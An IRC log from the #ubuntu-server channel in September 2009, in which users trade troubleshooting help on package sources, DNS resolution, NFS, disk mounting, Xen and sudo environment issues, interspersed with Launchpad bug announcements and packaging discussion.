<aubre> I'm a Solaris (but now becoming much more Ubuntu) server administrator by trade
<etbl> pmatulis: so 'sudo apt-get source ejabberd' won't do anything to alter the state of my system, other than create a some dirs/files in my CWD?
<nijaba> hello aubre: we might have, yes :)
<macstar> **that was lock a user into a folder
<aubre> when I wrote my tip suggestions I tried to write things that happened to me so far in my travails
<pmatulis> etbl: you don't even need sudo, that should tell you that you're not going to do anything serious to your system
<Daviey> nijaba: well i don't know if kirkland will want to do it, considering he has contributed to the project and initially uploaded it to universe for me. So, might have to grab someone else.
<etbl> well i don't care about whether its "serious" or not, just whether it'll do _anything_ at all
<pmatulis> etbl: just do it in a separate directory like /home/etbl/source
<aubre> I moved http://www.auburn.edu from Solaris Sparc to jaunty. I've been quite happy with the results.
<Daviey> nijaba: I'll try and get v0.3 ready for tonight.
<etbl> the manpage isn't quite clear on what a-g source does
<pmatulis> etbl: it *will* do something.  it will d/l the source
<nijaba> Daviey: kirkland is indeed a good candidate :)
<pmatulis> etbl: but that's all
<aubre> jaunty in vms beats solaris on bare metal.
<etbl> pmatulis: ok, thanks so much!
<aubre> Daviey: I enjoy ubuntu-uk podcast
<nijaba> aubre: that's great, thanks a lot for your help!
<etbl> pmatulis: its not there
<Daviey> aubre: great!
<pmatulis> etbl: huh?
<etbl> i just did a 'find . -name ejabberd.cfg' and it didn't return anything with etc in the path
<etbl> $ ls ejabberd-1.1.4  ejabberd_1.1.4-4.diff.gz  ejabberd_1.1.4-4.dsc  ejabberd_1.1.4.orig.tar.gz
<aubre> nijaba, Daviey : I also talked my director into giving me $7500 worth of hardware to setup and test UEC, and I've been working with zoopster and EtienneG to make it happen
<pmatulis> etbl: looks good
<uvirtbot`> New bug: #418897 in php5 (main) "Segfaults in apache2 with libapache2-mod-php5 installed" [Undecided,New] https://launchpad.net/bugs/418897
<nijaba> aubre: super cool!
<etbl> $ find . -name ejabberd.cfg ./ejabberd-1.1.4/src/win32/ejabberd.cfg ./ejabberd-1.1.4/examples/mtr/ejabberd.cfg ./ejabberd-1.1.4/debian/ejabberd.cfg
<etbl> what i need is /etc/ejabberd/ejabberd.cfg
<pmatulis> etbl: looks like you're after ejabberd-1.1.4/debian/ejabberd.cfg
<etbl> based on what?
<pmatulis> etbl: common sense
<nijaba> etbl: based on the fact that is is the one the deb will use to place it etc
<aubre> nijaba, Daviey : and FYI if you don't find my tips appropriate or don't want to use them you won't hurt my feelings lol. I am glad to see Asterisk coming into jaunty, Mark Spencer from Digium is a friend of mine, we once started a LUG together
<aubre> I mean in to karmic
<etbl> pmatulis: dude, i'm kind of new
<Daviey> aubre: nice, would like to hear how you get on with eucalyptus
<pmatulis> etbl: that's ok
<aubre> Daviey: I will be letting folks know
<nijaba> aubre: nothing personal on our side, we rae just trying to find the right balance.  quite new to us as well :)
<etbl> nijaba: how do you know that the deb is going to place that one in /etc?
<nijaba> etbl: well, I could confirm this by looking closer at the package, but mtr and win32 do not seem like good candidates for some obvious reason, don't they?
<etbl> what does mtr stand for? and why is there something labeled win32 in an ubuntu package?
<PhotoJim> mtr is "my traceroute"
<PhotoJim> if it's the package I know
<nijaba> etbl: remember that you just download the source.  apart from the debian directory, all the rest should be able to compile on any platform it is designed to run on.  It's therefore not surprising to see example configuration in there for other platforms.
<etbl> nijaba: ah, i see
<etbl> thank you for the very informative explanation.
<aubre> ebtl: for example in the apache2 source you will see code for Netware, among others
<etbl> so basically, i was starting with a stock ejabberd.cfg, and i had a set of instructions to modify it
<etbl> but i lost track of what i did, and had nothing to diff it against (at one ponit i was doing it as planned, and then at another point i was unintentionally editing my backup), so my edits were spread across the original file and the backup
<etbl> but you're saying that its safe to assume that that debian/ejabberd.cfg is exactly what my /etc/ejabberd/ejabberd.cfg file looked like before i did anything to it?
<etbl> pmatulis: nijaba:
<nijaba> etbl: Yes, this is what we assume.  In order to keep track of your changes, have a look at how you can use etckeeper to store your changes in bazaar
<pmatulis> nijaba: hey thanks for the tip!
<etbl> nijaba: yes, i've heard of that before, and it seems very attractive.  however, the way my machine is set up, most of my config. files end up way scattered all over the place.
<nijaba> etbl: ooops, you said earlier you were on 8.04...  and etckeeper does not work with bazaar until 9.04
<etbl> (not just /etc)
<nijaba> http: you can still use bazaar to version control your changes, it is just a bit more "manual"
<Guest8934> (and, it doesn't coordinate with APT)
<uvirtbot`> New bug: #424371 in openssh (main) "Logins to OpenSSH server slow due to "UseDNS yes" config" [Undecided,New] https://launchpad.net/bugs/424371
<Boohbah> that 'bug' sounds like luser error to me
<pmatulis> that's a bug?
<genii> Probably not
<Boohbah> no, he just needs to get his DNS resolver sorted
<Guest8934> nijaba: sorry, i'm REALLY REALLY tired right now, so may not be thinking straight
<Guest8934> and i know i mentioned this earlier, but is it not worth taking into account at all?
<Guest8934> packages.ubuntu.com/hardy/ejabberd
<Guest8934> http://packages.ubuntu.com/hardy/ejabberd
<Guest8934> nijaba: sorry, http://packages.ubuntu.com/hardy/i386/ejabberd/filelist
<smoser> ttx, http://developer.amazonwebservices.com/connect/entry.jspa?categoryID=223&externalID=2755
<smoser> ttx, http://developer.amazonwebservices.com/connect/entry.jspa?categoryID=223&externalID=2754
<Guest8934> nijaba: pmatulis: isn't it more likely that that debian/ejabberd.cfg file is the /usr/share/ejabberd/ one?
<smoser> ttx, http://developer.amazonwebservices.com/connect/isearch.jspa?searchKB=true&searchForums=true&searchQuery=karmic&x=0&y=0
<uvirtbot`> New bug: #424381 in samba (main) "package samba 2:3.3.2-1ubuntu3.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/424381
<smoser> ttx, http://uec-images.ubuntu.com/releases/karmic/alpha-5/ now has links to those pages
<ttx> smoser: you rock, dude
<Guest8934> nijaba: pmatulis: are you guys still there?
<pmatulis> Guest8934: yeah, w'sup?
<garymc> Had this problem a couple of weeks back managed to rectify but lost my paper telling me how. My problem, with one account only. When i load http://localhost/insert_record.php it asks to save it etc and doesnt load it in the browser. Now any other account loads it in the browser just not the one i use "Gary" This is in an LTSP server using Ubuntu server 9.04
<garymc> im logge in as a thin client
<Guest8934> pmatulis: if you're so confident that the ejabberd-1.14-src/debian/ejabberd.cfg file is the one that the deb places into /etc, then why does http://packages.ubuntu.com/hardy/i386/ejabberd/filelist not mention /etc/ejabberd/ejabberd.cfg?
<pmatulis> Guest8934: dunno
<clusty> hey
<clusty> is there a way to have the NFS server resolve itself symlinks?
<clusty> i have a lot of symlinks in my home folder pointing to all sorts of places and SMB was resolving them for me
<clusty> shared home and had access to all
<clusty> now these links are just broekn
<clusty> any way around sharing a gazillion locations?
<mathiaz> kirkland: https://bugs.launchpad.net/~ubuntu-server/+packagebugs
<clusty> any1?
<KillMeNow> any1 what? just logged in
<genii> KillMeNow: Their symlinks in an NFS-shared folder break when remote-mounted, etc
<genii> Because nfs mounting splices the server's folder into it's own filesystem, and it want to travel the local fs instead
<jbernard_> mathiaz: related to that, bug #313374
<uvirtbot`> Launchpad bug 313374 in linux "Hauppauge HVR-1600 is not always detected" [Undecided,Incomplete] https://launchpad.net/bugs/313374
<jbernard_> er, bug #312274
<uvirtbot`> Launchpad bug 312274 in sysstat "backport sysstat 8.1.7-1 from jaunty to Intrepid" [Wishlist,Triaged] https://launchpad.net/bugs/312274
<jbernard_> that one, i backported it and uploaded to my ppa
<mathiaz> jbernard_: would it fit in intrepid-backports - https://help.ubuntu.com/community/UbuntuBackports or intrepid-updates - https://wiki.ubuntu.com/StableReleaseUpdates ?
<uvirtbot`> New bug: #424442 in eucalyptus (main) "eucalyptus-nc should depend on avahi-utils" [Undecided,New] https://launchpad.net/bugs/424442
<J_P> ubuntu 9.10 will be with python 3 by default ?
<macstar> how do i remove a package that i installed with make && make install
<macstar> not to worry being a n00b
<J_P> macstar: make uninstall into dire that you install it... (if are there make uninstall). Or just remove files/dirs where was installed.
<uvirtbot`> New bug: #417213 in quagga (main) "Quagga wont bind to IPv6 [::0]" [Undecided,Incomplete] https://launchpad.net/bugs/417213
<jbernard_> mathiaz: my feeling is intrepid-backports, since the current version isn't flawed, i belive the bug reporter just wants a feature in a later release
<mathiaz> jbernard_: right - so -backports is the best place to go
<jbernard_> mathiaz: will do, thanks
<macstar> J_P: yeah done a make uninstall, failing that i was going to do make checkinstall and get a deb
<macstar> but didnt need to :)
<macstar> had a mental block for a moment, didnt really need top ask
<donspaulding> anyone in here running pure-ftpd with SSL and virtual users?
<donspaulding> because I am, and I can't seem to figure out why clients are hanging trying to make encrypted data connections on passive ports.
<Sam-I-Am> mathiaz: so apparently that glibc bug affects 'passwd' too ... ick.
<donspaulding> netstat shows that the server is listening on the passive port it replies to the client with, and wireshark on the client shows that it begins the handshake.
<Sam-I-Am> mathiaz: with 'ldap' in nsswitch.conf shadow, it somehow can't gain complete root access and can't write to /etc/.pwd.lock
<J_P> ubuntu 9.10 will be with python 3 by default ?
<Pici> J_P: 9.10 support and discussion is in #ubuntu+1 , but no, python 3 will not be default.
<J_P> Pici: ok
<ruben23> hi anyone
<ruben23> have setup vsftpd
<ruben23> whihc is running succesfully now
<uvirtbot`> New bug: #424368 in eucalyptus (main) "[FFE] local node discovery, debconf improvements" [Undecided,New] https://launchpad.net/bugs/424368
<Kompo> Does anybody have any idea where I could find list of preseed/partman commands? I'm setting up raid+lvm manually with preseed script since partman is so undocumented. I would now need to tell partman which existing partitions to use, but I don't know with which commands.
<andol> ttx: Regarding your latest suggestion on bug #334374.
<uvirtbot`> Launchpad bug 334374 in libnss-ldap "libnss-ldap should not depend on libpam-ldap" [Medium,Confirmed] https://launchpad.net/bugs/334374
<ttx> andol: yes
<uvirtbot`> New bug: #389051 in php5 (main) "Prototype inheritance enforced on __construct" [Wishlist,Triaged] https://launchpad.net/bugs/389051
<andol> ttx: You still want to leave ldap-auth-config as a hard dependency to libnss-ldap?
<ttx> andol: yes. That would be an alternate solution, that's worth considering.
<ttx> andol: mathiaz has been looking into it.
<ttx> andol: I thnk we need a little more time thin
<ttx> king at the best solution
<andol> ttx: While it would fix the specified bug it still seems wrong somehow. I mean, you can use libnss-ldap without ldap-auth-config installed. Should it really be a dependency then?
<ttx> andol: well, it needs a config file to work
<andol> ttx: So does a lot of programs, without a special config utility?
<ttx> those have their config files in the package
<ttx> I don't say the solution I suggest is better, just that we need more time to think about it
<andol> ttx: true, true
<andol> ttx: You might very well be right. Just that it feels like one of the big advantages of having recommends being installed by default is that you can have less hard dependcies.
<uvirtbot`> New bug: #356578 in php5 (main) "php5 crashed with SIGSEGV" [Medium,Incomplete] https://launchpad.net/bugs/356578
<uvirtbot`> New bug: #364723 in eucalyptus (main) "eucalyptus-nc service fail to start at boot, cannot connect to libvirtd" [Undecided,New] https://launchpad.net/bugs/364723
<cabbey> if I choose to have the system autoatically apply security updates, do I get an email to root when that happens? like as a reminder to reboot when security fixes hit the kernel for example?
<uvirtbot`> New bug: #364938 in eucalyptus (main) "In /etc/eucalyptus/eucalyptus.conf, VNET_DHCPDAEMON and VNET_DHCPUSER should be set to value appropriate for Ubuntu" [Undecided,New] https://launchpad.net/bugs/364938
<kirkland> kees: hey, i wanted your opinion https://bugs.edge.launchpad.net/byobu/+bug/424522 at your convenience
<uvirtbot`> Launchpad bug 424522 in byobu "Support ssh-agent socket update when reconnecting to an existing session" [Wishlist,Triaged]
<ScottK> Anyone on the server team that cares about php?
<maswan> I'm not on the team and I don't care about php, so hopefully I'm excused. ;)
<Sam-I-Am> i care about this possible glibc problem in karmic... :/
<Sam-I-Am> since its breaking all sorts of stuff
<ScottK> Yeah, I got a PHP related feature freeze exception and I'm looking for advice
<ScottK> Not a problem I'm likely to fix.
<Sam-I-Am> ScottK: is there any way to get action on a possibly nasty bug?
<alvin> Is the bug filed in Launchpad?
<Sam-I-Am> yup
<Sam-I-Am> bug 423252
<alvin> Then yes. The developers now know
<uvirtbot`> Launchpad bug 423252 in glibc "NSS using LDAP on Karmic (alpha 4) breaks 'su' and 'sudo'" [Undecided,New] https://launchpad.net/bugs/423252
<Sam-I-Am> about to update it too... breaks 'passwd' too
<Sam-I-Am> karmic is unusable with LDAP
<Sam-I-Am> or any other non-local auth
<alvin> pretty serious
<Sam-I-Am> at least best i can tell... something is blocking certain suid binaries from certain syscalls
<Sam-I-Am> same config works fine with hardy through jaunty, so i dont think its my ldap config
<Sam-I-Am> as a user, passwd can't write /etc/.pwd.lock
<Sam-I-Am> even for a local-only account
<xenoterracide_> can someone point me to a good doc on the interfaces file. I've a problem with a secondary nic setting the default gw when it shouldn't be
<xenoterracide_> that nic uses dhcp
<KillMeNow> Xeno:  you will need to set a reservation for that NIC's MAC address in your DHCP server where it doesn't pass the Gateway
<KillMeNow> or set it statically within the interfaces config file
<xenoterracide_> KillMeNow: ok. so there's not a nogw option in interfaces? asking because gentoo and arch have a way to say nodns nogw etc in there network configs
<xenoterracide_> for dhcp stuf
<KillMeNow> none that i know of
<KillMeNow> well maybe
<KillMeNow> in your interfaces file, add the line under your 2nd NIC:  GATEWAY=null
<KillMeNow> or perhaps GATEWAY=NO
<xenoterracide_> hmm
<KillMeNow> http://manpages.ubuntu.com/manpages/karmic/man5/interfaces.5.html
<KillMeNow> you might have to add a interface option.d method
<KillMeNow> otherwise, only way i can think of stopping the g/w from being set by DHCP is to set a reservation
<xenoterracide_> ok
<uvirtbot`> New bug: #379696 in libvirt (main) "package libvirt-bin 0.6.1-0ubuntu5 failed to install/upgrade: subprocess post-installation script returned error exit status 1 (dup-of: 363778)" [Undecided,New] https://launchpad.net/bugs/379696
<uvirtbot`> New bug: #421400 in apache2 (main) "package apache2-mpm-prefork 2.2.11-2ubuntu2.3 failed to install/upgrade: conflicting packages - not installing apache2-mpm-prefork" [Undecided,New] https://launchpad.net/bugs/421400
<xenoterracide_> hmm... no post up commands... that sucks
<uvirtbot`> New bug: #397931 in libvirt (main) "package libvirt-bin 0.6.1-0ubuntu5 failed to install/upgrade: podproces post-installation script vr?til chybov? status 1 (dup-of: 363778)" [Undecided,New] https://launchpad.net/bugs/397931
<uvirtbot`> New bug: #401588 in libvirt (main) "package libvirt-bin 0.6.1-0ubuntu5.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1 (dup-of: 363778)" [Undecided,New] https://launchpad.net/bugs/401588
<uvirtbot`> New bug: #406899 in libvirt (main) "package libvirt-bin 0.6.1-0ubuntu5.1 failed to install/upgrade: subprocess post-installation script returned error exit status 1 (dup-of: 363778)" [Undecided,New] https://launchpad.net/bugs/406899
<xenoterracide__> how do I bring up an interface not marked as  'auto'?
<guntbert> xenoterracide__: sudo ifup <if> ?
<KillMeNow> i think guntbert is correct
<genii> xenoterracide__: sudo ifconfig <eth0/whatever> up
<KillMeNow> genii beat me to it
<xenoterracide__> ifconfig is a manual way... would that even read interfaces?
<KillMeNow> i just peeked at the ifup help and it's ifconfig
<genii> Yes
 * guntbert hands genii a cup of coffee
<genii> xenoterracide__: If you have the /dev entry of an interface, ifconfig can use it
<genii> guntbert: Yay, coffee!
 * genii sips\\
<genii> xenoterracide__: Wireless interfaces are a different kettle of fish
<xenoterracide__> genii: yeah but will it start it with the config that's in interfaces?
<genii> xenoterracide__: Whats in /etc/network/interfaces   is used as as a first place to look. But if for instance /dev/eth3 exists, you can call it from ifconfig whether or not that file holds it
<genii> xenoterracide__: sudo ifconfig -a         shows you interfaces not present in that file for instance
<genii> (if they physically exist)
<erimar77> can anyone point me to a webpagge that allows users to change their openldap password?
<erimar77> would prefer not to write my own
<VirtualDisaster> erimar77: gosa2
<VirtualDisaster> erimar77: unfortunately there arent many ways to do that w/o third party software
<VirtualDisaster> well as far as users are concered
<VirtualDisaster> concerned*
<erimar77> thanks
<ScottK> Sam-I-Am: I don't know.  I recall what I think was discussion about that bug among senior developers, so I think the people that need  to know, know.
#ubuntu-server 2009-09-05
<Sam-I-Am> ScottK: good to hear :)
<DGMurdockIII> can anyone help me get sound working
<DGMurdockIII> or point me to some info how i can get it working on ubuntu server
<PhotoJim> this isn't helpful, but why do you need audio on a server?
<DGMurdockIII> need audio on my htpc
<PhotoJim> you'll probably get a lot more help setting up audio on the standard #ubuntu channel...
<PhotoJim> it's set up the same way on both standard and server editions... not sure if there is anything missing from the server kernel that is needed for audio though
<DGMurdockIII> i don't need GNOME or anything else running
<giovani> DGMurdockIII: we understand
<giovani> but the audio service is the same between desktop and server
<DGMurdockIII> ok
<giovani> have you used alsamixer to unmute the master channel?
<DGMurdockIII> no
<giovani> ... well that's essentially linux audio 101 :)
<giovani> start alsamixer
<giovani> and unmute all of the important-looking channels
<DGMurdockIII> if that dose not work
<giovani> well clearly there are many things that can go wrong
<giovani> but the troubleshooting for audio is generally the same across linux distributions
<giovani> make sure the card is supported, and that the driver was loaded for it
<ruben23> hi anyone have setup
<ruben23> vsftpd..?
<ruben23> and wroking smoothly
<giovani> sure, in the past
<clusty> hey
<clusty> got the weirdest problem ever: my machine has internet and somehow apt-get fails to get any packages
<clusty> saying mirrors are unreachable, when they are online
<clusty> any ideas what might this be?
<jmarsden> Does your machine have working DNS?  Have  you tried using different mirrors?
<qman__> first, check DNS
<jmarsden> :)
<qman__> then, check your apt sources.list
<clusty> jmarsden, http://pastebin.com/m28c30def
<clusty> i owuld say yes
<clusty> ping works. from another machine that has identical list i can do everything just fine
<qman__> next logical step, are you being blocked by a firewall along the way?
<clusty> qman__, cannot see how.
<jmarsden> clusty: You can use wget to see if you can grab a file or two from the same archive site as a fairly simple test of that.
<jmarsden> Or curl, or lftp, or whatever little command line file grabbing tool you prefer, really :)
<qman__> as long as it's an HTTP get
<qman__> since apt uses HTTP
<qman__> you can use telnet if you want
<clusty> http://pastebin.com/m6472610f
<clusty> WTF
<clusty> i also cannot wget
<qman__> well, that pinpoints it
<qman__> it's clearly a DNS issue on the local machine
<clusty> http://pastebin.com/m5cb336c3
<qman__> dig tends to work even if there's a local issue
<clusty> how?
<qman__> try nslookup
<clusty> http://pastebin.com/m6309df9e
<clusty> works
<clusty> lemme see one thing
<clusty> on this machine i was playing with puppet
<clusty> to use as a slave
<qman__> try ping
<qman__> it might be an nsswitch thing
<qman__> or whatever it is on ubuntu, I can't remember the name
<clusty> ping what?
<clusty> i did ping
<clusty> and works
<clusty> nscd?
<clusty> i am using nsswitrch
<clusty> cause machine have ldap auth
<qman__> if ping works but wget doesn't, then it's a different issue from what I was thinking
<qman__> wget is clearly not resolving the name, though it isn't clear why
<clusty> besides an educational experience is a waste of time to fix :D
<clusty> easiuer to reinstall all
<clusty> one machine out of 10 is twitching
<clusty> thanks for help
<qman__> yeah, that's pretty odd
<qman__> I've seen similar problems but all those tests show it's not those
<clusty> will just install a fresh ubu and copy on top conf files
<clusty> well i made a bit of mess of it :(
<clusty> still don't have proper local dns working
<clusty> thanks for trying
<jmarsden> clusty: Sounds like you edited the hosts line in /etc/nsswitch.conf and broke it, to me?
<jmarsden> dig and nslookup contain their own resolvers, but normal command line tools like wget will use the system resolver libraries and so honor nsswitch.conf.
<jmarsden> Are you already reinstalling, or do you want to pastebin your /etc/nsswitch.conf file?
<clusty> i can pastebin
<clusty> i canonet reinstall till monday
<clusty> boxes are in germany
<clusty> :D
<clusty> jmarsden, http://pastebin.com/m41321ce6
<clusty> that looks kinda fine to me
<jmarsden> Looks OK... is /etc/resolv.conf sane?  Maybe pastebin that too?
<clusty> http://pastebin.com/m11da9411
<clusty> last package i installed was puppet
<clusty> which i have yet to get working
<jmarsden> OK, so DNS uses a local nameserver... is that nameserver at 192.168.0.1 known to be working?
<clusty> yes
<clusty> that is the router
<clusty> and ping resolves IPs
<clusty> i mean hostnames
<jmarsden> If you replace it with your providers nameserver can you then wget and have the name resoltuion work for Ubuntu mirrors?
<clusty> second
<clusty> jmarsden, nope
<clusty> jmarsden, but how can i even use it?
<clusty> cause isp dns is: 192.168.178.1
<clusty> nvm
<clusty> :D
<jmarsden> I think I can now explain the ping vs wget issue... ping links libresolve.so.2, wget uses the system resolver libs.
<jmarsden> Huh?  How can your ISPs public DNS be a private IP address? :)
<clusty> nvm
<clusty> 1AM and too much beer :D
<jmarsden> So ping does not read the /etc/resolv.conf (I think), but wget and most other apps do use whatever is in /etc/resolv.conf
<jmarsden> I need to go AFK for a while, but I think if you just put working public nameserver IPs in your .etc/resolv.conf your DNS will work (for external hostname resolution, at least).
<clusty> i got same resolv.conf on all machines
<clusty> will try now with opendns
<clusty> thanks
<jmarsden> Ugh... opendns has other issues and is best avoided, IMO, but OK :)
<uvirtbot`> New bug: #424693 in samba (main) "samba install error" [Undecided,New] https://launchpad.net/bugs/424693
<uvirtbot`> New bug: #235562 in vm-builder "Add ability to build Debian virtual machines" [Wishlist,Triaged] https://launchpad.net/bugs/235562
<uvirtbot`> New bug: #287860 in vm-builder "vmbuilder EC2: Retry ec2-upload-bundle on failures" [Wishlist,Fix released] https://launchpad.net/bugs/287860
<uvirtbot`> New bug: #424789 in php5 (main) "PHP random segfaults on session_start();" [Undecided,New] https://launchpad.net/bugs/424789
<nijaba> Daviey: is it really necessary to prefix each tip with "Ubuntu Server Tip: "?  It eats quite a few characters on an already limited space (18 out of 160)
<Daviey> nijaba: not really, the reason for that is that it's my understanding that having the fortunes installed, means that when fortune is called on it's own, it will include our tips.  I feel that when someone fires the fortune command, and gets a server tip - it might be a little out of context
<Daviey> However, i'm happy to remove it
<nijaba> Daviey: right, but at the same time, fortunes never say where they are from, do they?
<nijaba> Daviey: I am currently inserting all the confirmed tips that were waiting in the bug list
<nijaba> Daviey: what do I need to do to update the po once done?
<Daviey> nijaba: don't worry about that, i've got a commit waiting to resolve that..
<Daviey> you essentially run the po4a with the cfg.
<Daviey> (see debian/rules )
<Daviey> nijaba: i'm sorry for brevity, being nagged to do DIY.
<nijaba> Daviey: ok, I'll submit the new tips without the po updated then
<Daviey> nijaba: i'll push the changes lool suggested today.
<conky_> hey sup
<conky_> anyone know how to remove all packages that are NOT dependant on ubuntu-server?
<conky_> a reverse regex?
<andresmujica> orphaned? or rdepends?
<conky_> whats rdepends?
<conky_> i want reverse of depends
<conky_> however ubuntu-server package not currently installed working on it
<conky_> andresmujica: ? and i meant ubuntu-minimal
<conky_> ok
<conky_> well
<conky_> how about taking everything out thats not needed.....
<conky_> anything besides deborphan?
<giovani> ugh, ubuntu keyserver down for others?
<jpds> giovani: Yes.
<android6011> I installed ubuntu server to  a drive, now I am adding 2 drives into the machine. How can I get them to show up in /media/ArchiveDisk1 /media/MainStorage1 ? I know I can add a line to /etc/fstab but how do I figure out the UUID and all that
<ruben23> hi
<android6011> they are going to be data drives for ftp, samba etc so I don't know what other options I might need to add
<conky_> eh
<conky_> android6011:
<conky_> open terminal; sudo fdisk -l
<conky_> now you have the partitions and types
<android6011> its showing as /dev/sda1
<conky_> df -h should show that mounted already
<conky_> most likely your root partition
<conky_> use pastbin and show df -h
<conky_> and sudo fdisk -l
<conky_> and cat /etc/fstab
<conky_> ::waits::
<android6011> the thing is, the main disk used to be /dev/sda but now the new one is, i just don't want to mess anything up, if i add more disks later and have them get mixed up if the /dev/sd# changes
<pmatulis> android6011: see blkid command and the contents of /dev/disk/by-uuid/
<android6011> the new drive isnt listed as mounted at all
<android6011> only sdb shows up in blkid
<conky_> android6011: you need to open box and put main drive on sata port 0/1 whichever's first
<conky_> then add the other drives whereever
 * conky_ waits.
<android6011> system drive is ide, others are sata
<conky_> sigh.
<conky_> well w/e
<conky_> does it still boot?
<conky_> /dev/sda7  /home ext4 relatime 0 2
<android6011> ya it boots fine, i know how to set boot priority and everything fine in bios, its just like i said, i dont want to add drives later and because i added mount points to /etc/fstab by like /dev/sda1 and the drives get switched and things go bad
<pmatulis> android6011: so use uuid's
<android6011> i cant find UUID of the drive though, only the current mounted paritions
<android6011> and like i said, im not sure if i should add in other options with the disk for better performance
<android6011> and also, for data drives, what fs should i use? XFS?
<maswan> I'd use xfs for anything over a dozen or so gb
<android6011> well they are 1TB drives so i guess xfs it is
<conky_> android6011:
<conky_> /dev/sda7  /home ext4 relatime,user 0 2
<conky_> thats my recommendation
<conky_> just change dev and mountpoint
<conky_> jf
<conky_> hf **
<android6011> conky_: so what does that do? the realtime,user 0 2 part?
<conky_> android6011: google.
<conky_> [update times accessed, let everyone thats user access, and the last bit you need to google, its  abit complicated]
<android6011> ok I used fdisk to delete all the partitions on the disk, created new part table, added a partition size of the disk, and did mkfs -t xfs /dev/sda1 . So I should be good to add it to /etc/fstab now right? nothign else to be done
<Alopoe> Hello guys do you know if the latest 64bit ubuntu server works with xen ?
<Alopoe> without any need to recompile the kernel...
<nick125> Alopoe: You have to get a kernel from somewhere else, since Ubuntu doesn't include a dom0 kernel in their repos.
<nick125> I used Debian's Xen dom0 kernel and it works fine, for what it's worth.
<Alopoe> nick i found that and installed debian also
<Alopoe> but it seems now i get errors in loading the xen kernel :(
<Alopoe> the last 2 lines before my system autoreboots xen are assign_interrupt_mode Found MSI capability
<Alopoe> [    0.462917] no ownder
<Alopoe> and then it hangs and auto reboot
<Alopoe> i am using debian 2.6.30 kernel (amd64)
<Alopoe> xen 3.4 and xen kernel 2.6.26-1-amd64
<Alopoe> any ideas ?
<uvirtbot`> New bug: #424942 in libnss-ldap (universe) "libnss-ldap prevents user authentication when ldap hosts lookup enabled " [Undecided,New] https://launchpad.net/bugs/424942
<uvirtbot`> New bug: #424949 in samba (main) "error during update from 8.04 to 8.10" [Undecided,New] https://launchpad.net/bugs/424949
<android6011> what is your favorite ftp server software and why
<domas> my favorite ftp server software is http server :)
<mattgyver> I rm running Jinzora on my 9.04 server its a music CMS that runs via apache.  Something is causing it (within my lan only) to restart the 9.04 computer when certain links are clicked.  I have reviewed all of my logs and have no idea what is causing this.  Anyone have any suggestions?
<peepsalot> is there a way to send Ctrl-A to a process running inside screen?
<giovani> of course
<giovani> read the screen manpage
<simon-o> peepsalot: just type Ctrl-A A
#ubuntu-server 2009-09-06
<quizme> when i type in gem1.9.1 it's there, but when i type in sudo gem 1.9.1 it's not found.
<ScottK> There's a sudo option to preserver your environment.  Look at man sudo and try that.
<quizme> i tried the -E option but it still says not found
<quizme> /opt/ruby/bin is in the sudo PATH too....
<quizme> and if i type sudo /opt/ruby/bin/gem1.9.1 it works too...
<ScottK> Not sure what to tell you ten.
<ScottK> What if you sudo -i and then try gem1.9.1?
<quizme> scottk that worked
<quizme> is sudo broken ?
<quizme> how do i reinstall it ?
<ScottK> That indicates a path/environment issue to me.
<ScottK> Not sure of the details though.
<ScottK> I doubt sudo is broken.
<quizme> /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/bin/ec2-api-tools/bin:.:/opt/ruby/bin:/home/david/bin
<quizme> it's in the PATH
<quizme> /opt/ruby/bin
<quizme> that was from sudo echo $PATH
<ScottK> Not sure then.
<qman__> my tty2 is locked up on one of my machines
<qman__> I killed the bash process running on it, and tried killing getty, but it's not coming back
<qman__> any suggestions?
<andresmujica> init q
<qman__> nothing
<andresmujica> disable the tty2 in inittab , then init q, enable again init q again...
<qman__> oh, ok
<qman__> um, where is the inittab on ubuntu?
<qman__> locate was no help
<andresmujica> ughh forget what i've said
<andresmujica> sorry
<andresmujica> different distro :(
<qman__> ah
<andresmujica> that's in redhat...
<qman__> I'm guessing it must be getty config then
<qman__> somewhere
<andresmujica> yeap..
<andresmujica> there's something within event.d
<qman__> there's a tty2 entry there
<andresmujica> zcat /usr/share/doc/system-services/README.Debian.gz
<qman__> thanks
<andresmujica> sudo stop tty2
<andresmujica> seems to be the one
<andresmujica> then start
<qman__> yeah, that's it, but it's still locked up
<qman__> hmm
<andresmujica> ohh :(
<qman__> I was able to spawn a tty7 and 8
<qman__> so I guess that'll do for now
<SuperRoach> I'm using webmin with my ubuntu server (8.04) install and noticed  that I can't do bandwidth monitoring due to iptables not functioning (it did work previously). Is there a way to re-enable iptables?
<holyhandgrenade> anyone here have any experiance setting up nagios/centreon on ubuntu server?
<holyhandgrenade> or more specificly.. Im trying to remmove centreon and nagios mysql DBs. Since i grated them certain permissions ..the drop command returns with ERROR 1044 (42000): Access denied for user....
<holyhandgrenade> i could purge the mysql package...but i dont really want to be that drastic
<holyhandgrenade> :]
<holyhandgrenade> !mysql#
<ubottu> Sorry, I don't know anything about mysql#
<holyhandgrenade> !mysql
<ubottu> LAMP is an acronym for Linux-Apache-MySQL-PHP. However, the term is often used for setups using alternative but different software, such as Perl or Python instead of PHP, and Postgres instead of MySQL. For help with setting up LAMP on Ubuntu, see  https://help.ubuntu.com/community/ApacheMySQLPHP - See also the Server CD installation process (different in Edgy+)
<holyhandgrenade> my mysql root dosnt seem to want to allow the root user to create databases
<ihtarlik> Why is samba-daemon listening on port 7?
<ihtarlik> I've looked all over, and I can find absolutely no documentation on why Samba has tcp port 7 open.  I know it's Samba because port 7 closes when I stop Samba.  I'm using Jaunty and Samba 3.3.2.
<SockPants> problem: for a virtual machine, i need virtualbox to be able to read and write to /dev/sda2. however, when i chmod it to 666 it just changes back again randomly... how can i make it permanent?
<macstar> i have an issue with ssh keys, i have copied my .pub key to authorized_keys on my root login, can now log in fine. I then created a new user copied the same authorized_keys file from the /root/.ssh folder but cannot login to the new user, any pointers ?
<holyhandgrenade> man ssh
<macstar> dont need to read the manual
<Sp0tter> I'm running xdm trying to connect via xming xdmcp.  I can connect and it shows the xdm login screen, but as soon as i put in my pw it just resets and shwos the login screen again.  I don't see any errorsin my xorg log or on my debug output from xdm.  Where should I look to find whats wrong?
<mattgyver> im running a website on my 9.04 server.  When im viewing my site within my LAN, certain links force the server computer to restart like you hit reset, any ideas?
<simplexio> mattgyver: hw problem, assuming that you dont run code which has shutdown/reboot commands
<simplexio> mattgyver: hw as broken hardware or netcard driver.. there is no other way explain that.
